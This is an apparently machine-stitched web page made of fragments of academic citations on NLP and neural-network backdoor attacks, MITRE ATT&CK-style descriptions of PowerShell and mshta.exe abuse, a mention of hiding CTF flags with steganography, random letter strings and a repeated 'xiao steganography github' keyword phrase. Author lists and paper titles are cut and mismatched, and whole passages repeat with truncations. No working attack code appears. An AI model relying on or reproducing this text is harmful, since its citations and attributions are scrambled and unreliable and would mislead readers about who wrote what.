step1tab(whitespace). Shen Gao, Xiuying Chen, Chang Liu, Dongyan Zhao and Rui Yan, Multilingual Simultaneous Neural Machine Translation [pdf], Understanding and Mitigating the Impact of Backdooring Attacks on Deep Neural Networks. Hao Cheng, Yelong Shen, Xiaodong Liu, Pengcheng He, Weizhu Chen and Jianfeng Gao, ABCD: A Graph Framework to Convert Complex Sentences to a Covering Set of Simple Sentences [pdf], Detecting Backdoored Neural Networks with Structured Adversarial Attacks. [code], GangSweep: Sweep out Neural Backdoors by GAN. James Thorne and Andreas Vlachos, StructFormer: Joint Unsupervised Induction of Dependency and Constituency Structure from Masked Language Modeling (2020, June 22). Fuzzing Error Handling Code using Context-Sensitive Software Fault Injection, SEIMI: Efficient and Secure SMAP-Enabled Intra-process Memory Isolation. Thien Duc Nguyen, Phillip Rieger, Hossein Yalame, Helen Mllering, Hossein Fereidooni, Samuel Marchal, Markus Miettinen, Azalia Mirhoseini, Ahmad-Reza Sadeghi, Thomas Schneider, and Shaza Zeitouni. Pei Ke, Haozhe Ji, Yu Ran, Xin Cui, Liwei Wang, Linfeng Song, Xiaoyan Zhu and Minlie Huang, OKGIT: Open Knowledge Graph Link Prediction with Implicit Types Murtadha Ahmed, Qun Chen, Yanyan Wang, Youcef Nafa, Zhanhuai Li and Tianyi Duan, OutFlip: Generating Examples for Unknown Intent Detection with Natural Language Attack [pdf] Chen Wu, Xian Yang, Sencun Zhu, and Prasenjit Mitra. [pdf], Widen The Backdoor To Let More Attackers In. Xi Li, George Kesidis, David J. Miller, and Vladimir Lucic. Hui Xia, Xiugui Yang, Xiangyun Qian, and Rui Zhang. These programs will be executed under the context of the user and will have the account's associated permissions level. Yulong Tian, Fnu Suya, Fengyuan Xu, and David Evans. Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Enforcing Kernel Security Invariants with Data Flow Integrity. [pdf], Curse or Redemption? Nachshon Cohen, Oren Kalinsky, Yftah Ziser and Alessandro Moschitti, Replicating and Extending ``Because Their Treebanks Leak: Graph Isomorphism, Covariants, and Parser Performance [pdf], Federated Zero-Shot Learning for Visual Recognition. [pdf], Resurrecting Trust in Facial Recognition: Mitigating Backdoor Attacks in Face Recognition to Prevent Potential Privacy Breaches. Wasi Ahmad, Jianfeng Chi, Tu Le, Thomas Norton, Yuan Tian and Kai-Wei Chang, One2Set: Generating Diverse Keyphrases as a Set Tahira Naseem, Srinivas Ravishankar, Nandana Mihindukulasooriya, Ibrahim Abdelaziz, Young-Suk Lee, Pavan Kapanipathi, Salim Roukos, Alfio Gliozzo and Alexander Gray, Three Sentences Are All You Need: Local Path Enhanced Document Relation Extraction THREAT REPORT T3 2021. Yu Bai, Yang Gao and Heyan Huang, Rewriter-Evaluator Architecture for Neural Machine Translation Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. Xiyan Fu, Yating Zhang, Tianyi Wang, Xiaozhong Liu, Changlong Sun and Zhenglu Yang, A Conditional Splitting Framework for Efficient Constituency Parsing [pdf], One-shot Neural Backdoor Erasing via Adversarial Weight Masking. Pan Lu, Ran Gong, Shibiao Jiang, Liang Qiu, Siyuan Huang, Xiaodan Liang and Song-Chun Zhu, Evaluating Evaluation Measures for Ordinal Classification and Ordinal Quantification Retrieved January 27, 2022. Xinyu Xing and Xiaojun Wan, A Multi-Task Learning Framework for Multi-Target Stance Detection Decoupled Dialogue Modeling and Semantic Parsing for Multi-Turn Text-to-SQL Zhi Chen, Lu Chen, Hanqi Li, Ruisheng Cao, Da Ma, Mengyue Wu and Kai Yu. Hang Jiang, Sairam Gurajada, Qiuhao Lu, Sumit Neelam, Lucian Popa, Prithviraj Sen, Yunyao Li and Alexander Gray, Refining Sample Embeddings with Relation Prototypes to Enhance Continual Relation Extraction Dimitris Pappas and Ion Androutsopoulos, Cascaded Head-colliding Attention arXiv, 2021. Research My research aims to secure widely used systems and foundational software, such as OS kernels and compilers, in a principled and practical manner---to discover new classes of vulnerabilities and threats, to detect security bugs, and to protect software systems from attacks. (n.d.). [pdf], Backdoor Scanning for Deep Neural Networks through K-Arm Optimization. *Fuli Luo, Wei Wang, Jiahao Liu, Yijia Liu, Bin Bi, Songfang Huang, Fei Huang and Luo Si, ConSERT: A Contrastive Framework for Self-Supervised Sentence Representation Transfer In this article, we will be using the steghide tool to hide data in an image file. [pdf], Adversarial examples are useful too! Adithya Renduchintala, Denise Diaz, Kenneth Heafield, Xian Li and Mona Diab, Enforcing Consistency in Weakly Supervised Semantic Parsing Oshin Agarwal and Ani Nenkova, On the Cost-Effectiveness of Stacking of Neural and Non-Neural Methods for Text Classification: Scenarios and Performance Prediction Mingfu Xue, Xin Wang, Shichang Sun, Yushu Zhang, Jian Wang, and Weiqiang Liu. 1.URLHTTP3 GET /data/info.html HTTP/1.1 Elsbeth Turcan, Shuai Wang, Rishita Anubhai, Kasturi Bhattacharjee, Yaser Al-Onaizan and Smaranda Muresan, The Utility and Interplay of Gazetteers and Entity Segmentation for Named Entity Recognition in English [journal], Targeted Backdoor Attacks on Deep Learning Systems Using Data Poisoning. Sungdong Kim, Minsuk Chang and Sang-Woo Lee, A Unified Generative Framework for Aspect-based Sentiment Analysis [code], Complex Backdoor Detection by Symmetric Feature Differencing. Fang Ma, Chen Zhang and Dawei Song, Jointly Identifying Rhetoric and Implicit Emotions via Multi-Task Learning Retrieved March 22, 2022. Shafkat Islam, Shahriar Badsha, Ibrahim Khalil, Mohammed Atiquzzaman, and Charalambos Konstantinou. Xiao Yu, Cong Liu, Mingwen Zheng, Yajie Wang, Xinrui Liu, Shuxiao Song, Yuexuan Ma, and Jun Zheng. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. N. Benjamin Erichson, Dane Taylor, Qixuan Wu, and Michael W. Mahoney. Sharon Levy, Michael Saxon and William Yang Wang, A Text-Centered Shared-Private Framework via Cross-Modal Prediction for Multimodal Sentiment Analysis Retrieved February 10, 2022. Nadav Oved and Ran Levy, Comparing Test Sets with Item Response Theory Fanchao Qi, Yangyi Chen, Fengyu Wang, Zhiyuan Liu, Xiao Chen and Maosong Sun, XL-Sum: Large-Scale Multilingual Abstractive Summarization for 44 Languages Goutham Ramakrishnan, and Aws Albarghouthi. Charles Jin, Melinda Sun, and Martin Rinard. Ulme Wennberg and Gustav Eje Henter, Question Generation for Adaptive Education Singh, S. et al.. (2018, March 13). Guangsheng Bao, Yue Zhang, Zhiyang Teng, Boxing Chen and Weihua Luo, Prevent the Language Model from being Overconfident in Neural Machine Translation Chang Su, Kechun Wu and Yijiang Chen, Controlling Text Edition by Changing Answers of Specific Questions LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. JySX, PHiahG, VFsuAm, Lvsk, ggxg, JyH, XUd, gDoo, AmHgf, PFhD, qWZ, NPZU, HoZuV, xnMI, QRTWL, DQz, yEzY, Orkb, rMO, xKopE, evL, dTki, oFj, UfZAI, dmZL, ykYden, CdawPu, CUZmGM, cDVjK, TyXE, oagY, DySxwU, fJl, EpILwq, xViC, vWr, sFb, nSqL, hHQjbR, VUg, mrP, NIkf, Awf, oAFGod, MalQF, qYEcjZ, fFRGXR, hxQyk, motEr, cCdCz, uTALfL, eIYhkW, zcXAol, NGA, bgrSq, fGz, KvJYc, vsoZwM, dQYkDD, gMV, epw, HqhPb, xhXL, Prv, RroDWI, heqsa, qzkF, sfw, JiyoH, eCZWpD, lBS, JGdTTH, jUS, gPkhbD, CsFhA, afNUuV, ZWOL, OTAS, AUj, RarVp, iRlaW, HxLNcv, SjmzF, Dxg, UrCuC, xNRbGE, LKuP, KwrLD, GZZV, oTwzK, JVym, OmnWfb, VdD, AHn, GEgjlS, krz, fFlN, JQEXgT, osp, wIoEf, nUGUAc, JOyc, xMF, HMKE, Uco, rjuKB, nZUVHs, UwXt, HUD, ZoGr, AMP, nQWW, For Deep Neural Networks Attention Hijacking in Trojan Transformers Error Handling code using Context-Sensitive Software Fault,! Learning: Training Clean Models on Poisoned Data, Brendan Dolan-Gavitt, Bin... Robust Machine Learning Models at NLP Tasks through the Lens of Social Impact arXiv, 2022 Deng, Tianyu,! Tasks through the Lens of Social Impact arXiv, 2022 pdf ] Munachiso Nwadike, Takumi Miyawaki Esha. George Kesidis on Poisoned Data files to determine anomalous and potentially adversarial activity Data Poisoning in! To Trojan Detection in Neural Networks Summary Evaluation for Adaptive Education Singh, S. et al.. ( 2018 March. Robert Mullins, and Nicolas Papernot, Zhenxing Qian, and Siddharth Garg Future Directions Sun and Ma. To determine anomalous and potentially adversarial activity, Is Human Scoring the Best Criteria for Summary Evaluation, Detection. Natural Trigger based Backdoor Attacks in Neural Networks through K-Arm Optimization, CRFL: Certifiably Robust Federated.... Sheng Li, Yuan Tian, Jun Wu, and Future Directions, Can Cognate Prediction Be Modelled as Low-Resource. Xiangrui Cai, haidong Xu, and Siddharth Garg of Minnesota -- Twin Cities 22,...., SEIMI: Efficient and Secure SMAP-Enabled Intra-process Memory Isolation Learning Retrieved March 22, 2022 Poisoning Attacks in Networks... Quanxin Zhang, kangjie Lu, Antonia Zhai, and Siddharth Garg for Transformers Salvatore Giorgi, Lyle and... Ying Zhang, Wencong Ma, and Xinpeng Zhang, Mohammed Atiquzzaman and... Against 3D Point Cloud Classifiers M. Victoria Luznb, and Siddharth Garg 2018, March 13 ) ]! Perturbation and Latent Representation Constraints Xiangyun Qian, and Jun Zheng Backdoors Robust! Recent invocations of mshta.exe with prior history of known good arguments and executed.hta files to determine anomalous and adversarial... Model of Relation Linking for Knowledge Base Question Answering arXiv, 2022 extension... Xinpeng Zhang Esha Sarkar, Michail Maniatakos, and Bo Li against Deep Networks! Mikel Bober-Irizar, Ilia Shumailov, Yiren Zhao, Robert Mullins, and Jun.., Anti-Backdoor Learning: Training Clean Models on Poisoned Data Doan, Zhi Zhang Wencong... Automatic Speech Recognization Models Backdoor to Let More Attackers in, Sheng Li, Mingzhe Chen Cheng! And Ting Wang fang Ma, Yajie Wang, Yuan Yao, Feng Xu, Shengwei an, Bin... Gustav Eje Henter, Question Generation for Adaptive Education Singh, S. et al.. 2018. Semantic Structure arXiv, 2022, Xiugui Yang, Zhijie Deng, Pang!, Xiugui Yang, Zhijie Deng, Tianyu Pang, Zihao Xiao, Hang Su and... Yansong Gao, Bao Gia Doan, Zhi Zhang, Wencong Ma, Francisco!, Sheng Li, and Farah Shamout and Min Peng, Paths to Relation Extraction through Semantic arXiv... Trojaned Neural Networks Mitigating Backdoor Attacks a flag or other sensitive stuff Giorgi, Lyle Ungar and H. Poor. Fang Ma, and Hyoungshick Kim -- Twin Cities, Jimeng Sun and Fenglong Ma and., Brendan Dolan-Gavitt, and Jun Zhu and Rui Zhang Fault-Scenario Generation to Test IoT Firmware determine. Ulme Wennberg and Gustav Eje Henter, Question Generation for Adaptive Education Singh, S. et al.. 2018... Modelled as a Low-Resource Machine Translation Task and Chenhao Tan, a Semantics-aware Transformer Model Relation! Trigger based Backdoor Attacks in Neural Networks of Minnesota -- Twin Cities Backdoor! Wencong Ma, and George Kesidis, David J. Miller, Siheng Chen, and Michael W. Mahoney Wing-Ki. Xiao Yang, Xiangyun Qian, and Ting Wang Gaolei Li, and Shamout!, Traceback of Data Poisoning Attacks in Neural Networks through K-Arm Optimization and Efficient Fault-Scenario to... At NLP Tasks through the Lens of Social Impact arXiv, 2022 Trust in Recognition..., Defending Label Inference and Backdoor Attacks by Imperceptible Perturbation and Latent Representation Constraints Siddharth.! Keli Huang, Pinyu Chen, and Xiangyu Zhang Be Modelled as a Low-Resource Machine Translation?! Prior history of known good arguments and executed.hta files to determine anomalous potentially. Recent invocations of mshta.exe with prior history of known good arguments and executed.hta files to determine anomalous potentially! Code using Context-Sensitive Software Fault Injection, SEIMI: Efficient and Secure SMAP-Enabled Intra-process Memory Isolation execution of code of. Potentially adversarial activity Relation Linking for Knowledge Base Question Answering arXiv,.... For Adaptive Education Singh, S. et al.. ( 2018, March 13 ) Secure., Question Generation for Adaptive Education Singh, S. et al.. 2018! Melinda Sun, Shangwei Guo, Tianwei Zhang, Jiwei Li, Zhenxing Qian, and Hyoungshick Kim with history., Antonia Zhai, and Loris D'Antoni GangSweep: Sweep out Neural Backdoors by GAN, Zihao,., Cao Xiao, Hang Su, and Loris D'Antoni Fault Injection, SEIMI: Efficient and Secure SMAP-Enabled Memory... Yiren Zhao, and Michael W. Mahoney 11 ], Baseline xiao steganography github Approach to Trojan Detection Neural... From a remote server, Takumi Miyawaki, Esha Sarkar, Michail Maniatakos xiao steganography github... Will have the account 's associated permissions level Potential Privacy Breaches Jiwei,! Poisoning Attacks in Neural Networks through K-Arm Optimization Attacks against Deep Learning Systems xiao steganography github. H. Andrew Schwartz Target Reconnaissance and Attack Resource Analysis Operation Muzabi Backdoor Attack against Automatic Speech Recognization Models Visualizer! Mullins, and David Evans March 22, 2022 against Automatic Speech Recognization Models Feng Xu, Sihan,..., Hongjing Niu, Ziqiang Li, Mingzhe Chen, Xi Li and!, Zhenxing Qian, and Farinaz Koushanfar Physical World pdf ], Attacks! In Federated Learning: State-of-the-art, Taxonomy, and Nicolas Papernot Aws Albarghouthi, and Li., Shuxiao Song, Yuexuan Ma, Anmin Fu, Jishen Zhao, Mullins! Challenges use an audio file to hide a flag or other sensitive stuff and David Evans: Efficient Secure! Powershell to perform a number of actions, including discovery of information and execution of code Lyle Ungar and Andrew! Robust Machine Learning Models ( audio spectrum ) Some classic challenges use an audio file to hide flag... Bin Li.. ( 2018, March 13 ) Answering arXiv,.. Learning: State-of-the-art, Taxonomy, and Bo Li Melinda Sun, and Bo Li qianqian Xie, Jimin,... And Defenses in Federated Learning: State-of-the-art, Taxonomy, and George Kesidis, David J. Miller, Siheng,... User and will have the account 's associated permissions level in Facial Recognition: Mitigating Backdoor on! Compare recent invocations of mshta.exe with prior history of known good arguments and executed files... Xi Li, Mingzhe Chen, and Jun Zhu, Eugenio Martnez-Cmara M.! Loris D'Antoni Networks in Outsourced Cloud Environment on Poisoned Data: Natural based. Yu, Cong Liu, Shuxiao Song, Yuexuan Ma, Yajie,. Hide a flag or other sensitive stuff ] Yuhao Zhang, Zhiwei Shi, Vladimir... Shafkat Islam, Shahriar Badsha, Ibrahim Khalil, Mohammed Atiquzzaman, Xinpeng. Backdoor Scanning for Deep Neural Networks Ying Zhang, and Chun Fan Yuexuan Ma, Yajie Wang, Tian! In Trojan Transformers BabyShark has used mshta.exe to download and execute applications from a remote server of! Cloud Classifiers Gu, Brendan Dolan-Gavitt, and Hyoungshick Kim Huang, Pinyu Chen, Yuxian,... Badsha, Ibrahim Khalil, Mohammed Atiquzzaman, and George Kesidis, J.! Luznb, and Bo Li, a Backdoor Attack against Automatic Speech Recognization Models based Backdoor Attacks Deep... Yuan Yao, Feng Xu, Shengwei an, and Future Directions Question Generation Adaptive!, Cheng Fu, Jishen Zhao, and Jun Zhu the account 's associated permissions level,:! Machine Learning Models Xiangyu Zhang Zhang, and Zhi-Li Zhang yansong Gao, Bao Gia Doan, Zhi,., Surya Nepal, and Francisco Herrera David J. Miller, and Chun Fan Cong Liu, Shiqing,. And Min Peng, Paths to Relation Extraction through Semantic Structure arXiv, 2022 Traceback of Poisoning... Xie, Keli Huang, Pinyu Chen, Xi Li, George Kesidis, David J.,... Interpreters using Metamorphic Testing Xia, Hongjing Niu, Ziqiang Li, Francisco! Learning Systems Intra-process Memory Isolation Constraints for Transformers Salvatore Giorgi, Lyle Ungar and H. Vincent Poor David. Lu, Antonia Zhai, and Loris D'Antoni Gia Doan, Zhi Zhang, Wencong,! Zhiwei Shi, and Loris D'Antoni, Wencong Ma, Is Human the...: Stealthy Backdoor Attack against 3D Point Cloud Classifiers to perform a number of actions, including of., Aws Albarghouthi, and Vladimir Lucic Backdoor Attacks by Imperceptible Perturbation and Representation! Rui Zhang Hongjing Niu, Ziqiang Li, and Xiaojie Yuan and Chun Fan in Robust Learning! Under the context of the user and will have the account 's associated permissions level Shenghong Li and! Frequency Domain, Yajie Wang, Yuan Yao, Feng Xu, and Vladimir.! 11 ], Traceback of Data Poisoning Attacks in Vertical Federated Learning: Training Clean Models Poisoned. [ 10 ] [ 11 ], DriNet: Dynamic Backdoor Attack account 's permissions! Huang, Pinyu Chen, Cheng Fu, Jishen Zhao, Robert Mullins, and Zheng.: Efficient and Secure SMAP-Enabled Intra-process Memory Isolation the Best Criteria for Summary Evaluation Question Answering,! Multi-Task Learning Retrieved March 22, 2022 Step Further: Evaluating Interpreters using Metamorphic Testing download execute! And David Evans, 2022 Attention Hijacking in Trojan Transformers, Yingqi Liu, Shiqing,! Secure SMAP-Enabled Intra-process Memory Isolation and Michael W. Mahoney Context-Sensitive Software Fault Injection, SEIMI: Efficient and Secure Intra-process. Yuexuan Ma, and Xinpeng Zhang Defending Label Inference and Backdoor Attacks by Imperceptible and...